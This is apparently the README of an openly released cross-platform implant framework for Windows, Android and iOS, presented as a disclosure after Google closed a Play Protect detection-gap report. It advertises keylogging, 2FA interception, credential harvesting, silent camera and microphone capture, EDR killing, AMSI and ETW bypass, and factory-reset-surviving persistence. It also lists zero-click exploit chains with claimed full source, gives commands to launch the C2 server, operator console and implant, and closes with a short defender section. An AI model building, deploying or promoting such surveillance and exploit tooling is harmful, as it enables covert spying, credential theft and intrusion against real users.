Autonomous Behavioral Implant Framework Windows + Android + iOS | 78 source files | 3.2 MB
Google VRP Status: "Working As Intended"
This framework was disclosed to Google through the Vulnerability Reward Program as a detection gap report against Google Play Protect. An APK built with this framework evaded Play Protect detection for 9+ days on a stock Android 16 device. Google closed the report as "Working As Intended." The appeal was denied. This is the public release.
| Date | Event |
|---|---|
| 2026-04-06 | Framework built and tested |
| 2026-04-06 | APK installed on test device (Samsung Galaxy, Android 16, stock ROM) |
| 2026-04-15 | 9-day undetected dwell confirmed. Filed Google Issue Tracker #502802174 |
| 2026-04-15 | Submitted detection gap report to Google VRP with APK sample |
| 2026-04-XX | Google response: "Working As Intended" |
| 2026-04-XX | Appeal filed |
| 2026-04-XX | Appeal denied |
| 2026-04-19 | Public release |
What "Working As Intended" means: Google's position is that Play Protect is a best-effort heuristic detection layer, not a security boundary. A 33KB APK with Accessibility Service god mode, keylogging, silent camera/microphone, TOTP interception, credential harvesting, and encrypted C2 sitting undetected on a stock device for over a week is, per Google, the expected behavior of their security product.
An implant framework that learns what "normal" looks like on a target device, then operates exclusively within that behavioral envelope. Every action the implant takes is statistically indistinguishable from the legitimate user's behavior.
The framework includes an autonomous decision engine (the "Brain") that profiles the target, classifies the machine's role, selects a mission, and executes without operator input. The operator's role shifts from directing the implant to reviewing its results.
EDR and mobile security products detect anomalies. If the implant generates zero anomalies, there is nothing to detect. The Mimic proves this thesis across three platforms.
Behavioral learning, process parasitism (lives inside the user's foreground app), traffic-shaped DNS-over-HTTPS C2, NTFS ADS encrypted storage, autonomous targeting, credential harvesting, document intelligence, lateral movement.
C++ native: Indirect syscalls (JMP to ntdll gadget), BYOVD EDR kill (wsftprm.sys), Ekko sleep obfuscation, DKOM kernel callback removal, module stomping, patchless AMSI bypass, ETW blinding, stack spoofing.
Accessibility Service god mode: keylogging, full screen reading, permission auto-grant, TOTP/2FA interception, messaging extraction (WhatsApp/Signal/Telegram/Discord), silent camera, silent microphone, GPS with geofencing, uninstall blocking. Four-layer persistence (boot receiver + FCM + WorkManager + alarms). Root persistence via system library replacement. FCM-based C2 over Google infrastructure.
Three implant variants (GHOSTBLADE/GHOSTSABER/GHOSTKNIFE). 60+ data categories. DarkSword-style JS-only architecture avoids SPTM and code signing. Native bridge for file I/O, SQLite, Keychain dump. Three-tier persistence: re-exploitation, LaunchDaemon, BCM4387 firmware (survives factory reset).
| Vector | Target | CVE | Type |
|---|---|---|---|
| iMessage DNG | iOS 18.0-18.6.1 | CVE-2025-43300 | Zero-click |
| Dolby RCS audio | Android | CVE-2025-54957 | Zero-click |
| Samsung DNG | Samsung Galaxy | CVE-2025-21042 | One-click |
| DarkSword watering hole | iOS 18.4-18.7.2 | 6 CVEs | One-click |
| Aladdin malvertising | Both | Unpatchable | Zero-click |
Full exploit chain source included in delivery/. The DarkSword chain is 38,618 lines covering RCE, sandbox escape, PAC bypass, and post-exploitation for iOS 18.4 through 18.7.2.
# Start C2 server
pip install flask
python infrastructure/mimic_unified_server.py --port 8443
# Launch operator console
python infrastructure/mimic_unified_operator.py --server https://localhost:8443
# Windows implant (demo mode)
python windows/mimic_orchestrator.py --demo --domain your-c2.comThe_Mimic/
windows/ 8 Python modules (profiler, brain, parasite, C2, ghost, orchestrator, lateral, dropper)
cpp/ 8 C++ modules (native implant with indirect syscalls, BYOVD, Ekko, DKOM)
android/ 3 Python + 6 Java + APK build scripts + manifests
ios/ JS implant (3 variants) + Obj-C native bridge + persistence
mobile_core/ 5 shared mobile modules (brain, C2, GPS, harvest, core)
delivery/ 5 CVE exploit crafters + DarkSword chain (38K lines) + Scudo toolkit
infrastructure/ Unified C2 server + operator console
docs/ User manual (21 sections)
WHITEPAPER.md Full research paper
The Mimic defeats behavioral detection by eliminating the signal that detection depends on:
- Temporal: Only operates during the user's learned active hours
- Process: Lives inside the user's foreground application (no dedicated process)
- Network: DoH beacons shaped to match user's connection baseline
- Storage: NTFS ADS with machine-bound encryption (invisible to Explorer)
- Kernel: Indirect syscalls from ntdll address space + DKOM callback removal
- Sleep: RC4-encrypted .text section during idle (defeats memory scanning)
- Mobile: Accessibility Service (legitimate system component) + FCM C2 (Google infrastructure)
If you are a defender, the white paper (WHITEPAPER.md) includes a full section on detection strategies. Key approaches:
- Establish behavioral baselines before infection, not after
- Monitor NTFS ADS creation on system files
- Scan user-space processes for injected RWX regions without backing modules
- Route DoH through corporate resolvers; apply DNS entropy analysis
- Alert on credential store access by non-browser processes
- Correlate across data sources (no single source reveals The Mimic)
- Monitor Accessibility Service grants and audit bound services
- Flag FCM message patterns inconsistent with legitimate app behavior
This software is released for educational and defensive research purposes. See LICENSE for terms. Deployment against any system without explicit written authorization is prohibited.
The techniques documented here are not novel individually. Process injection, traffic shaping, ADS storage, accessibility abuse, and zero-click exploits all exist in documented offensive tooling and academic literature. The contribution is their integration into a coherent cross-platform evasion model with autonomous targeting, and the empirical demonstration that a major mobile security product fails to detect the result.
2026 -- Independent Security Research Google Issue Tracker #502802174